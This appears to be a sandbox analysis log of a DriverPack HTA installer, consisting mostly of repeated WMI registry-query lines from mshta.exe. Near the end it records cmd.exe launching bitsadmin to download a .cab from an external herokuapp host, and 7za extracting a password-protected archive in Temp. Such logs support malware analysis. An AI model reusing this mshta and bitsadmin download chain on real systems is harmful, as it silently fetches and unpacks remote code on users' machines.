Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetDWORDValue
Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe x -y -aoa -pbeetle "C:\Users\user\AppData\Local\Temp\beetle-cab\arc.7z" -o"C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe x -y -aoa -pbeetle "C:\Users\user\AppData\Local\Temp\beetle-cab\arc.7z" -o"C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack"
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://driverpack.io/en
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=1956,i,15950142881014853540,921028854998315971,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=1956,i,15950142881014853540,921028854998315971,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Downloads\PROD_Start_DriverPack.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c bitsadmin /transfer dwnl-task-48795 /download /priority foreground http://dwrapper-dev.herokuapp.com/beetle-cab.cab "C:\Users\user\AppData\Local\Temp\dwnl_48795\dwnl_beetle-cab.cab" | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\user\AppData\Local\Temp\dwnl_48795\log_bits_start.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin /transfer dwnl-task-48795 /download /priority foreground http://dwrapper-dev.herokuapp.com/beetle-cab.cab "C:\Users\user\AppData\Local\Temp\dwnl_48795\dwnl_beetle-cab.cab"
